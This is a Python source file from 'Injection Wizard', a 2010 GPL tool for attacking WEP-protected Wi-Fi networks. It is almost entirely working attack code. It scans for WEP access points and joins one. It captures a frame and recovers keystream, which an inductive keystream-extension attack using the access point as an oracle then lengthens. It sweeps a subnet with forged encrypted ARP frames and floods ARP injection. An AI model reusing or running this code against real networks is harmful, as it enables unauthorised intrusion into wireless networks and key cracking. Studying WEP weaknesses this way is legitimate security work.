 # -*- coding: UTF-8 -*-
 # Injection Wizard
# --An application for injecting traffic in WEP protected Wi-Fi networks--
# Version: 1.0
# Copyright (C) 2010 Fernando Pablo Romero Navarro <fernpromero@gmail.com>
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; either version 2
#of the License, or (at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#

import socket
import time
import array
import threading

import msg
import flags
import iwlibs
import logger
import actions
import session
import filters
from scapy.utils import str2mac, mac2str
from scapy.layers.l2 import ARP, SNAP, LLC
from scapy.layers.dot11 import Dot11, Dot11WEP
from auxclass import *
from commsrv import NetCommServ, DummyCommServ
from sndrcvth import SendReceiveDot11
from indatck import ORACLE_AP, WEPOracle, InductiveAttack
from indatck import NoConnectionException, NoResponseException


RECV_TIME=0.1
WAIT_ASK=120


chanlock=threading.Lock()
lockowner=None
cancel=CancelMonitor()
comserv=DummyCommServ(RECV_TIME)


def channel_is_locked():
    global chanlock
    
    return chanlock.locked()

def get_lock_channel():
    global chanlock, lockowner

    chanlock.acquire()
    lockowner=threading.currentThread().getName()    
    return comserv

def release_channel():
    global chanlock, lockowner

    if chanlock.locked():
        lockowner=None
        chanlock.release()

def change_online(cntsock):
    global chanlock, lockowner, comserv

    try:
        chanlock.acquire()        
        lockowner="Main"
        comserv.release()
        comserv=NetCommServ(cntsock, RECV_TIME)
        chanlock.release()
        lockowner=None
    except Exception:
        control.release_channel()
        raise

def change_offline():    
    global chanlock, lockowner, comserv

    try:
        chanlock.acquire()        
        lockowner="Main"
        comserv.release()
        comserv=DummyCommServ(RECV_TIME)
        chanlock.release()
        lockowner=None
    except Exception:
        control.release_channel()
        raise


def get_config(mesg, thisthread, advstage=False):
    response=None
    cmmsrv=None
    configitem=mesg[1:]    
    errorcode=None

    try:        
        if configitem==msg.IFACES:
            errorcode=msg.ENUM_IFACES
            session.iflist.update()
            mngifaces=session.iflist.list_ifaces("Managed")

            if len(mngifaces)==0:
                response=msg.RESP+msg.NONE
            else:
                response=msg.RESP+msg.OK
                for iface in mngifaces:
                    response=response+iface+msg.ITEM_SEP            

        elif configitem==msg.CONFIG:
            if session.srvconfig.is_updated_by_client():                
                response=msg.RESP+msg.OK+\
                         session.srvconfig.get_cli_config_str(advstage)
            else:
                response=msg.RESP+msg.NONE
                
        elif configitem==msg.JOINEDBSS:
            essid=session.srvconfig.get_SSID()
            bssid=session.srvconfig.get_ap_MAC()
            joinedbss=None
            for bsscan in session.cachescan:
                if bsscan.bssid==bssid:
                    joinedbss=bsscan
                    break
            
            if joinedbss is None:
                response=msg.RESP+msg.NONE
            else:
                result=array.array("c", "")
                result.extend(chr(len(essid)))
                result.extend(essid)
                result.extend(mac2str(bssid))
                result.extend(chr(joinedbss.frequency.getChannel()))
                snr=joinedbss.quality.getSignallevel()-joinedbss.quality.getNoiselevel()
                snr=snr+128
                if snr<0:
                    snr=0
                elif snr>255:
                    snr=255
                result.extend(chr(snr))
                quality=joinedbss.quality.quality
                if quality<0 or quality>255:
                    quality=0
                result.extend(chr(quality))
                response=msg.RESP+msg.OK+result.tostring()
                
            
        else:
            response=msg.RESP+msg.NOT_APPLICABLE

        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()

    except socket.error:
        logger.srvlogger.exception("Connection error")
        release_channel()
        raise
    except EnvironmentError:
        
        if(errorcode is None):
            response=msg.RESP+msg.SERVER_ERROR+msg.NOT_SPECIFIED
        else:
            response=msg.RESP+msg.SERVER_ERROR+errorcode

        if(channel_is_locked() and lockowner==thisthread.getName()):
            pass
        else:
            cmmsrv=get_lock_channel()
            
        try:
            cmmsrv.writemsg(response)
            logger.srvlogger.exception("System error")
        except socket.error:
            logger.srvlogger.exception("Connection & System error")
            raise
        finally:
            release_channel()



def set_config(mesg, thisthread):
    response=None    
    errorcode=None
    indvalsep=1
    inditmsep=1
    configparam=None
    configvalue=None    
    inditem=1
    iface=None
    moniface=None
    cmmsrv=None

    try:
        indvalsep=mesg.find(msg.VALUE_SEP, inditem)
        inditmsep=mesg.find(msg.ITEM_SEP,  inditem)

        while(indvalsep>0 and inditmsep>0):
            configparam=mesg[inditem:indvalsep]
            configvalue=mesg[indvalsep+1:inditmsep]


            if configparam==msg.WIFACE:
                iface=configvalue
                sc,moniface,mac=actions.enable_mon_iface(session.iflist, iface)

                if(sc==0):
                    session.srvconfig.set_if_cli(iface)
                    session.srvconfig.set_if_mon(moniface)
                    session.srvconfig.set_if_MAC(str2mac(mac))                   
                else:
                    if sc==-4:
                        errorcode=msg.IFACE_NOT_ENABLED
                    elif sc==-2:
                        errorcode=msg.MON_IFACE_NOT_CREATED
                    elif sc==-1:                        
                        errorcode=msg.MON_IFACE_NOT_ENABLED

                    raise EnvironmentError

            elif configparam==msg.MONHDR:   
                                            
                if(configvalue==msg.AUTO):
                    ifname=session.srvconfig.get_if_mon()
                    if ifname is None:
                        errorcode=msg.MON_IFACE_NOT_SET
                        raise EnvironmentError
                    else:
                        type=actions.guess_monitor_header_type(ifname)
                        if type is None:
                            type=0
                else:
                    type=ord(configvalue)                  
                
                session.srvconfig.set_mon_head_type(type)

            elif configparam==msg.FCS:
                
                if configvalue=="\x00":
                    session.srvconfig.set_has_fcs(False)
                    Dot11.enable_FCS(False)
                else:
                    session.srvconfig.set_has_fcs(True)
                    Dot11.enable_FCS(True)

            elif configparam==msg.STAGE:

                if configvalue==msg.STAGE_NEXT:
                    stage=session.srvconfig.get_stage()
                    session.srvconfig.set_stage(stage+1)
                elif configvalue==msg.STAGE_INIT:                    
                    session.srvconfig.detach_bssid()
                    session.srvconfig.set_stage(0)
                    session.stagedata.__init__()

            elif configparam==msg.SUBNET:                 
                session.srvconfig.set_subnet(configvalue)

            elif configparam==msg.SEARCH:                
                session.srvconfig.set_search_type(ord(configvalue))

            elif configparam==msg.MINRET:                
                minret=ord(configvalue)
                session.srvconfig.set_min_retries(minret)
                session.srvconfig.set_max_retries(minret*2+2)

            elif configparam==msg.MINTMO:                
                mintime=ord(configvalue)
                session.srvconfig.set_short_timeout(mintime)
                session.srvconfig.set_medium_timeout(mintime*3)
                session.srvconfig.set_long_timeout(mintime*5)

            else:
                pass

            inditem=inditmsep+1
            indvalsep=mesg.find(msg.VALUE_SEP, inditem)
            inditmsep=mesg.find(msg.ITEM_SEP,  inditem)

        
        resp=msg.RESP+msg.OK
        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(resp)
        release_channel()

    except socket.error:
        logger.srvlogger.exception("Connection error")
        release_channel()
        raise
    except EnvironmentError:
        if errorcode is None:
            response=msg.RESP+msg.SERVER_ERROR+msg.NOT_SPECIFIED
        else:
            response=msg.RESP+msg.SERVER_ERROR+errorcode
        

        if(channel_is_locked() and lockowner==thisthread.getName()):
            pass
        else:
            cmmsrv=get_lock_channel()

        try:
            cmmsrv.writemsg(response)
            logger.srvlogger.exception("System error")
        except socket.error:
            logger.srvlogger.exception("Connection & System error")
            raise
        finally:
            release_channel()




def process_scan(thisthread):
    response=None
    cmmsrv=None

    try:
        ifname=session.srvconfig.get_if_cli()
        iface=iwlibs.Wireless(ifname)
        bsscan=iface.scan()

        response=msg.RESP
        if bsscan is None:
            bsscan=[]

        wepbss=lambda x: x.mode=="Master" and x.encode==flags.IW_ENCODE_WEP
        filtscan=filter(wepbss, bsscan)

        if len(filtscan)==0:
            response=response+msg.NONE
        else:
            result=array.array("c", "")
            essid=None
            snr=None
            quality=None
            for bss in filtscan:
                # @type bss Iwscanresult
                essid=bss.essid
                if essid is None or essid=="" or essid=="\x00":
                    result.extend("\x00")
                else:
                    result.extend(chr(len(essid)))
                    result.extend(essid)

                result.extend(mac2str(bss.bssid))
                result.extend(chr(bss.frequency.getChannel()))
                snr=bss.quality.getSignallevel()-bss.quality.getNoiselevel()
                snr=snr+128
                if snr<0:
                    snr=0
                elif snr>255:
                    snr=255
                result.extend(chr(snr))
                quality=bss.quality.quality
                if quality<0 or quality>255:
                    quality=0
                result.extend(chr(quality))

            
            response=msg.RESP+msg.OK+result.tostring()

        session.cachescan=filtscan
        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()

    except socket.error:
        logger.srvlogger.exception("Connection error")
        release_channel()
        raise
    except EnvironmentError:
        response=msg.RESP+msg.SERVER_ERROR+msg.NOT_SPECIFIED

        if(channel_is_locked() and lockowner==thisthread.getName()):
            pass
        else:
            cmmsrv=get_lock_channel()

        try:
            cmmsrv.writemsg(response)
            logger.srvlogger.exception("System error")
        except socket.error:
            logger.srvlogger.exception("Connection & System error")
            raise
        finally:
            release_channel()


def join_bss(mesg, thisthread):
    # @type cancel CancelMonitor
    global cancel

    bssid=str2mac(mesg[1:7])
    has_essid=(ord(mesg[7:8])!=0)
    essid=None
    chan=None
    response=None
    cmmsrv=None

    try:
        # @type bss iwlibs.Iwscanresult
        for bss in session.cachescan:
            if bss.bssid==bssid:
                chan=bss.frequency.getChannel()
                if has_essid:
                    essid=bss.essid
                break

        if chan is None:
            response=msg.RESP+msg.SERVER_ERROR+msg.MON_IFACE_CHAN_NOT_SET
        else:
            response=msg.RESP+msg.DOING
        
        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()

        actions.set_monitor_channel(session.srvconfig.get_if_mon(), chan)
        if not has_essid:            
            essid=actions.discover_essid(session.srvconfig, bssid, cancel)
            if essid is not None:
                response=msg.INFO+msg.JOINBSS+msg.ESSID_FOUND+essid
                cmmsrv=get_lock_channel()
                cmmsrv.writemsg(response)
                release_channel()
            

        if cancel.is_cancelled() or (essid is None):
            response=msg.INFO+msg.JOINBSS+msg.CANCELLED
            cmmsrv=get_lock_channel()
            cmmsrv.writemsg(response)
            release_channel()
        else:            
            session.srvconfig.set_SSID(essid)
            session.srvconfig.set_ap_MAC(bssid)

            joined=False           
            sc=None
            joinerr=None

            sc=actions.do_join(session.srvconfig)

            if cancel.is_cancelled():                   
                pass
            elif sc==actions.RespStatus.SUCCESS:        
                joined=True
            elif sc==actions.RespStatus.NO_RESPONSE:
                joinerr=msg.NO_RESPONSE
            elif sc==actions.RespStatus.AUTH_REJECT:
                joinerr=msg.AUTH_ERROR            
            elif sc==actions.RespStatus.ASSO_REJECT:
                joinerr=msg.ASSO_ERROR

            
            if joined:
                response=msg.INFO+msg.JOINBSS+msg.DONE
            else:
                session.srvconfig.set_SSID(None)
                session.srvconfig.set_ap_MAC(None)
                if cancel.is_cancelled():
                    response=msg.INFO+msg.JOINBSS+msg.CANCELLED
                else:
                    response=msg.INFO+msg.JOINBSS+joinerr
                
            cmmsrv=get_lock_channel()
            cmmsrv.writemsg(response)
            release_channel()

    except socket.error:
        logger.srvlogger.exception("Connection error")
        release_channel()
        raise
    except EnvironmentError:
        response=msg.RESP+msg.SERVER_ERROR+msg.NOT_SPECIFIED
        
        if(channel_is_locked() and lockowner==thisthread.getName()):
            pass
        else:
            cmmsrv=get_lock_channel()
        try:
            cmmsrv.writemsg(response)
            logger.srvlogger.exception("System error")
        except socket.error:
            logger.srvlogger.exception("Connection & System error")
            raise
        finally:
            release_channel()


def capture(thisthread):    
    # @type cancel CancelMonitor
    global cancel
    MINLENGTH=12
    response=None
    cmmsrv=None
    pktfind=None
    approved=False
    dot11=None
    wep=None
    keystr=None
    addr1=None
    addr2=None
    pkt=None
    ans=None
    
    try:        
        response=msg.RESP+msg.DOING
        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()
        
        if session.stagedata.get_keystream() is not None:
            response=msg.INFO+msg.CAPFRAME+msg.DONE
            cmmsrv=get_lock_channel()
            cmmsrv.writemsg(response)
            release_channel()
            return

        lsf="link[0]==0x08"
        bssid=session.srvconfig.get_ap_MAC()
        filt=lambda x: filters.is_WEP_into_BSS(x, bssid)
        timeout=1.0
        pktfind=PacketFinder(session.srvconfig, lsf, [filt], timeout)
        datalen=0
        
        while not cancel.is_cancelled() and not approved:
            pkt=pktfind.find()
            if pkt is None:
                pass
            else:
                dot11=pkt.getlayer(Dot11)
                wep=dot11.getlayer(Dot11WEP)
                if dot11.getfieldval('FCfield') & 0x01 != 0:
                    addr1=dot11.getfieldval('addr2')
                    addr2=dot11.getfieldval('addr3')
                else:
                    addr1=dot11.getfieldval('addr3')
                    addr2=dot11.getfieldval('addr1')

                datalen=len(wep.getfieldval('wepdata'))
                if datalen>=MINLENGTH:
                    ans=thisthread.ask_client(msg.CAPFRAME, msg.USE_FRAME,
                                             [msg.YES, msg.NO], msg.YES, WAIT_ASK,
                                             len=str(datalen), srcaddr=addr1,
                                             dstaddr=addr2)

                    if ans==msg.YES:
                        approved=True
             
        
        abort=cancel.is_cancelled()        
        if not abort:
            keystr=actions.extract_init_ks(wep)
            addr=session.srvconfig.get_if_MAC()
            wepframe=actions.build_WEP_test_frame(wep.getfieldval("keyid"),
                                                  wep.getfieldval("iv"),
                                                  keystr, addr)

        
        noconnect=False
        testnotdone=True            
        oracle=WEPOracle(session.srvconfig, ORACLE_AP)
        testassoc=False
        testframe=False
        sc=None
        
        while testnotdone and not abort:
            testassoc=actions.probe_association(session.srvconfig)
            if testassoc:
                time.sleep(0.5)
                testframe=oracle.test_WEP_frame(wepframe)
                if testframe==oracle.NO_CONNECTION: 
                    noconnect=True
                else:
                    noconnect=False
                    testnotdone=False
               
            else:               
                noconnect=True

            while noconnect:
                ans=thisthread.ask_client(msg.CAPFRAME, msg.TRY_JOIN,
                                          [msg.YES, msg.NO], msg.YES, WAIT_ASK)

                if ans==msg.YES:
                    sc=actions.do_join(session.srvconfig)
                    if sc==actions.RespStatus.SUCCESS:
                        noconnect=False
                else:
                    abort=True
                    break
            
        
        oracle.release()

        if abort:
            response=msg.INFO+msg.CAPFRAME+msg.CANCELLED
        elif testframe==oracle.NO_RESPONSE:
            response=msg.INFO+msg.CAPFRAME+msg.NO_RESPONSE
        elif testframe==oracle.OK:
            response=msg.INFO+msg.CAPFRAME+msg.DONE
            session.stagedata.set_WEP_frame(wep)
            session.stagedata.set_keystream(keystr)
        else:
            raise EnvironmentError

        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()

    except socket.error:
        logger.srvlogger.exception("Connection error")
        release_channel()
        raise
    except EnvironmentError:
        response=msg.RESP+msg.SERVER_ERROR+msg.NOT_SPECIFIED

        if(channel_is_locked() and lockowner==thisthread.getName()):
            pass
        else:
            cmmsrv=get_lock_channel()
        try:
            cmmsrv.writemsg(response)
            logger.srvlogger.exception("System error")
        except socket.error:
            logger.srvlogger.exception("Connection & System error")
            raise
        finally:
            release_channel()



def extend(thisthread):    
    # @type cancel CancelMonitor
    global cancel

    srvconf=session.srvconfig
    wepframe=session.stagedata.get_WEP_frame()
    iv=wepframe.getfieldval('iv')
    keyid=wepframe.getfieldval('keyid')
    keystream=session.stagedata.get_keystream()
    srcmac=session.srvconfig.get_if_MAC()
    p=LLC()/SNAP()/ARP(hwsrc=srcmac, psrc="192.168.0.250", pdst="192.168.0.1")
    payld=str(p)
    kslength=len(payld)+4
    
    response=None
    commsrv=None
    attack=None

    try:
        response=msg.RESP+msg.DOING
        commsrv=get_lock_channel()
        commsrv.writemsg(response)
        release_channel()
        
        if len(session.stagedata.get_keystream()) >= kslength:
            response=msg.INFO+msg.EXTENDKS+msg.DONE
            commsrv=get_lock_channel()
            commsrv.writemsg(response)
            release_channel()
            return

        attack=InductiveAttack(srvconf, ORACLE_AP, keyid, iv, payld, keystream)
        remainbytes=True
        abort=False
        offset=len(keystream)
        ksbyte=0
        pause=10
        times=1
        MAXPAUSE=500
        MSEGS=1000

        while remainbytes and not abort:
            
            try:
                ksbyte=attack.next()
                keystream=session.stagedata.get_keystream()
                session.stagedata.set_keystream(keystream+chr(ksbyte))
                offset=offset+1
                response=msg.INFO+msg.EXTENDKS+msg.BYTEFOUND+\
                         ("offset=%d;value=%d;" % (offset, ksbyte))
                         
                commsrv=get_lock_channel()
                commsrv.writemsg(response)
                release_channel()
                times=1
                pause=10
                         
            except (NoConnectionException, NoResponseException):
                if(times>256):
                    pause=(pause+5) % MAXPAUSE
                    time.sleep(pause/MSEGS)
                    times=1
                else:
                    times=times+1
                    
                testasso=actions.probe_association(srvconf)
                if testasso:
                    pass
                else:
                    ans=thisthread.ask_client(msg.EXTENDKS, msg.TRY_JOIN,\
                                              [msg.YES, msg.NO], msg.YES, WAIT_ASK)
                    if ans==msg.YES:
                        actions.do_join(srvconf)
                    else:
                        abort=True                
            except StopIteration:
                remainbytes=False
            finally:
                if not abort:
                    abort=cancel.is_cancelled()
        
        if remainbytes:
            response=msg.INFO+msg.EXTENDKS+msg.CANCELLED
        else:
            response=msg.INFO+msg.EXTENDKS+msg.DONE
            

        commsrv=get_lock_channel()
        commsrv.writemsg(response)
        release_channel()

    except socket.error:
        logger.srvlogger.exception("Connection error")
        release_channel()
        raise
    except EnvironmentError:
        response=msg.RESP+msg.SERVER_ERROR+msg.NOT_SPECIFIED

        if(channel_is_locked() and lockowner==thisthread.getName()):
            pass
        else:
            cmmsrv=get_lock_channel()
        try:
            cmmsrv.writemsg(response)
            logger.srvlogger.exception("System error")
        except socket.error:
            logger.srvlogger.exception("Connection & System error")
            raise
        finally:
            release_channel()
    finally:
         if attack is not None:
            attack.release()


def find_host(thisthread):
    # @type cancel CancelMonitor
    global cancel

    MAXHOSTNUM=255
    WEPAYLOAD_MIN_LEN=36
    WEPAYLOAD_MAX_LEN=60
    PAUSE=0.01

    response=None
    cmmsrv=None
    sendrcv=None
    timeout=session.srvconfig.get_medium_timeout()
    retries=session.srvconfig.get_max_retries()
    apmac=session.srvconfig.get_ap_MAC()
    ifmac=session.srvconfig.get_if_MAC()
    ifmon=session.srvconfig.get_if_mon()
    l2packet=session.srvconfig.get_monitor_packet()
    lsf="link[0]==0x08 or link[0]==0xD4"
    pktfilts=[lambda x: filters.is_ACK(x, ifmac),
              lambda x: filters.is_Data_frame_to_client(x, ifmac)]
             

    arp=ARP()
    arp.setfieldval('hwsrc', ifmac)
    arp.setfieldval('pdst', "0.0.0.0")
    arp.setfieldval('psrc', "0.0.0.0")
    payload=LLC()/SNAP()/arp
    wep=session.stagedata.get_WEP_frame()
    iv=wep.getfieldval('iv')
    keyid=wep.getfieldval('keyid')
    keystr=session.stagedata.get_keystream()
    dot11=Dot11()
    dot11.proto=0
    dot11.type='Data'
    dot11.subtype=0
    dot11.FCfield='to-DS+wep'
    dot11.ID=6000
    dot11.SC=0xCE0
    dot11.addr1=apmac
    dot11.addr2=ifmac
    dot11.addr3='ff:ff:ff:ff:ff:ff'
    dot11.addr4=None
    pkt=actions.add_monitor_header(session.srvconfig, dot11)
    ack=actions.add_monitor_header(session.srvconfig, actions.build_ack(apmac))
    sendrcv=None
    netprefix=session.srvconfig.get_subnet()
    ipgen=None
    subnet=None
    host=None

    if session.srvconfig.get_search_type()==0:
        ipgen=IPSGenAscComp()
        MAXHOSTNUM=254
        checkhost=True
    else:
        ipgen=IPSGenPreParc()
        MAXHOSTNUM=255
        checkhost=False

    try:
        response=msg.RESP+msg.DOING
        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()
        
        if session.stagedata.get_inject_ARP() is not None:
            response=msg.INFO+msg.FINDHOST+msg.DONE
            cmmsrv=get_lock_channel()
            cmmsrv.writemsg(response)
            release_channel()
            return
                
        
        sendrcv=SendReceiveDot11(ifmon, l2packet, lsf)
        sendrcv.set_filters(pktfilts)
        sendrcv.set_timeout(timeout)
        sendrcv.set_retries(retries)
        sendrcv.set_min_wanted_frames(1)
        sendrcv.set_end_frame_threshold(2)
        sendrcv.set_num_end_frames(8)
        sendrcv.set_end_frame(ack)
        
        ipaddr=None
        frames=[]
        abort=cancel.is_cancelled()
        found=False
        times=1
        maxtimes=3
        testasc=False
        ans=None

        for subnet, host in ipgen:
            ipaddr=netprefix+'.'+str(subnet)+'.'+str(host)
            arp=payload.getlayer(ARP)
            arp.setfieldval('pdst', ipaddr)
            if host<10:
                arp.setfieldval('psrc', ipaddr[:-1]+"20")
            else:
                arp.setfieldval('psrc', ipaddr[:-2]+"1")

            wep=actions.build_Dot11WEP_frame(keyid, iv, keystr, payload)
            dot11=pkt.getlayer(Dot11)
            dot11.remove_payload()
            dot11.add_payload(wep)
            times=1
            found=False
            
            while not abort and not found and times < maxtimes:
                frames=sendrcv.send(pkt)
                if len(frames)<2:
                    testasc=actions.probe_association(session.srvconfig)
                    if testasc:
                        times=times+1
                    else:
                        ans=thisthread.ask_client(msg.FINDHOST, msg.TRY_JOIN,
                                                  [msg.YES, msg.NO],
                                                  msg.YES, WAIT_ASK)
                        if ans==msg.YES:
                            actions.do_join(session.srvconfig)
                        else:
                            abort=True

                else:
                    found=True
                    
            time.sleep(PAUSE)
            

            abort=abort or cancel.is_cancelled()
            if abort:
                break
            elif found:
                tmpkt=frames[1].getlayer(Dot11WEP)
                if tmpkt is None:
                    found=False
                else:
                    wepdata=tmpkt.getfieldval('wepdata')
                    lng=len(wepdata)
                    if lng<WEPAYLOAD_MIN_LEN or lng>WEPAYLOAD_MAX_LEN:
                        found=False
                    else:                                            
                        response=msg.INFO+msg.FINDHOST+msg.HOSTFOUND+ipaddr
                        cmmsrv=get_lock_channel()
                        cmmsrv.writemsg(response)
                        release_channel()
                        break

            else:                
                ipstr=None
                if checkhost and host==MAXHOSTNUM:
                    iparts=ipaddr.split(".")
                    iparts[3]="X"
                    ipstr=".".join(iparts)
                        
                elif subnet==MAXHOSTNUM:
                    iparts=ipaddr.split(".")
                    iparts[2]="X"
                    ipstr=".".join(iparts)
                
                if ipstr is not None:
                    response=msg.INFO+msg.FINDHOST+msg.NOTFOUND+ipstr
                    cmmsrv=get_lock_channel()
                    cmmsrv.writemsg(response)
                    release_channel()

        
        if abort:
            response=msg.INFO+msg.FINDHOST+msg.CANCELLED
        elif found:
            response=msg.INFO+msg.FINDHOST+msg.DONE
            session.stagedata.set_inject_ARP(pkt)
        else:
            response=msg.INFO+msg.FINDHOST+msg.NO_RESPONSE


        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()

    except socket.error:
        logger.srvlogger.exception("Connection error")
        release_channel()
        raise
    except EnvironmentError:      
        response=msg.RESP+msg.SERVER_ERROR+msg.NOT_SPECIFIED        
        
        if(channel_is_locked() and lockowner==thisthread.getName()):
            pass
        else:
            cmmsrv=get_lock_channel()

        try:
            cmmsrv.writemsg(response)
            logger.srvlogger.exception("System error")
        except socket.error:
            logger.srvlogger.exception("Connection & System error")
            raise
        finally:
            release_channel()

    finally:
        if sendrcv is not None:
            sendrcv.release()



def inject(thisthread):    
    # @type cancel CancelMonitor
    global cancel

    PAUSE=0.25
    MAXCOUNT=100

    response=None
    cmmsrv=None
    sendrcv=None
    frames=[]
    timeout=session.srvconfig.get_long_timeout()
    retries=session.srvconfig.get_min_retries()
    apmac=session.srvconfig.get_ap_MAC()
    ifmac=session.srvconfig.get_if_MAC()
    ifmon=session.srvconfig.get_if_mon()
    l2packet=session.srvconfig.get_monitor_packet()
    ack=actions.add_monitor_header(session.srvconfig, actions.build_ack(apmac))
    arp=session.stagedata.get_inject_ARP()
    lsf="link[0]==0x08"
    pktfilts=[lambda x: filters.is_Data_frame_from_client(x, ifmac),
              lambda x: filters.is_Data_frame_to_client(x, ifmac)]


    try:
        sendrcv=SendReceiveDot11(ifmon, l2packet, lsf)
        sendrcv.set_filters(pktfilts)
        sendrcv.set_timeout(timeout)
        sendrcv.set_retries(retries)
        sendrcv.set_min_wanted_frames(1)
        sendrcv.set_end_frame_threshold(2)
        sendrcv.set_num_end_frames(10)
        sendrcv.set_end_frame(ack)

        
        response=msg.RESP+msg.DOING
        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()

        count=0
        total=0
        while not cancel.is_cancelled():
            frames=sendrcv.send(arp)
            
            if len(frames)==2:
                count=count+1

            total=total+1

            if total>=MAXCOUNT:
                response=msg.INFO+msg.INJECTARP+msg.FRAMES+\
                         str(count)+"/"+str(total)
                         
                cmmsrv=get_lock_channel()
                cmmsrv.writemsg(response)
                release_channel()

                if count==0:
                    tstasoc=actions.probe_association(session.srvconfig)
                    if tstasoc is None or not tstasoc:
                        actions.do_join(session.srvconfig)

                count=0
                total=0
            else:
                time.sleep(PAUSE)

        response=msg.INFO+msg.INJECTARP+msg.CANCELLED
        cmmsrv=get_lock_channel()
        cmmsrv.writemsg(response)
        release_channel()

    except socket.error:
        logger.srvlogger.exception("Connection error")
        release_channel()
        raise
    except EnvironmentError:
        response=msg.RESP+msg.SERVER_ERROR+msg.NOT_SPECIFIED

        if(channel_is_locked() and lockowner==thisthread.getName()):
            pass
        else:
            cmmsrv=get_lock_channel()

        try:
            cmmsrv.writemsg(response)
            logger.srvlogger.exception("System error")
        except socket.error:
            logger.srvlogger.exception("Connection & System error")
            raise
        finally:
            release_channel()

    finally:
        sendrcv.release()
